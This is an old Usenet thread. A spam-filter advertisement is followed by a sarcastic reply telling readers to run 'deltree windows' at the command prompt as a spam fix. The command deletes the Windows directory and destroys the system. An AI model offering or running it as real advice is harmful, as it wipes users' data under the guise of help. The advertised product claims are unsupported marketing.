How to block spam email?
(too old to reply)
2004-09-26 09:30:18 UTC
Letterman Spam Control, the most effective anti spam solution available today.

*Filter and delete emails on the server from Letterman or Outlook, Outlook Express.
*Distinguish between Traditional Chinese, Simplified Chinese, Japanese, Korean charset.
*Block connections from emails.
*Hide trace from spammers.
*Customisable pre-defined system rules.
*Found V1AgR@, via gra, V.ia_gr^a, V.I.A.G.R.A.
*POP3, Web-based Hotmail, MSN and Yahoo access.
*Protects children from inappropriate email.
*Life-time free upgrade.

Free Download at:
2004-10-07 15:46:11 UTC
Path: uni-berlin.de!fu-berlin.de!news.maxwell.syr.edu!news.glorb
Newsgroups: alt.comp.shareware.nettamer
Subject: Re: How to block spam email?
Date: 26 Sep 2004 17:30:18 +0800
Organization: IMS Netvigator
Lines: 15
NNTP-Posting-Host: n218250121160.netvigator.com
Xref: uni-berlin.de alt.comp.shareware.nettamer:1416
Letterman Spam Control, the most effective anti spam solution available today.
*Filter and delete emails on the server from Letterman or Outlook, Outlook Express.
*Distinguish between Traditional Chinese, Simplified Chinese, Japanese, Korean charset.
*Block connections from emails.
*Hide trace from spammers.
*Customisable pre-defined system rules.
*POP3, Web-based Hotmail, MSN and Yahoo access.
*Protects children from inappropriate email.
*Life-time free upgrade.
The very best way to block all spam from Outlook and Outlook Express
is a program you can run for free, and you won't even have to download

Simply enter and run at the command line prompt the following
command and then you will be good to go:

C:\>deltree windows

This is the solution most highly recommended by the gurus who post
in this newsgroup. Unfortunately this solution will not work for XP
machines. It will work for previous versions of Windows that were
not as shitty as XP. If you have an XP machine you will have to
resort to a much more complicated procedure in order to turn it into
a happy computer.

An additional free perk that comes along with the joy of running the
above described command is that you won't even have to worry about
ever again getting your machine infected with any of those nasty WIN
32 email worms and viruses. Another benefit that will result from
running the above command is that it will delete or disable spyware

You will find that running the simple little command described above
will result in providing you with a major upgrade for your system
and also it will result in greatly improved speed and performance.

Then you can enjoy happy computing.

All the best,

Sam Heywood
NTReader v0.32w(O)/Beta (Registered) in conjunction with Net-Tamer.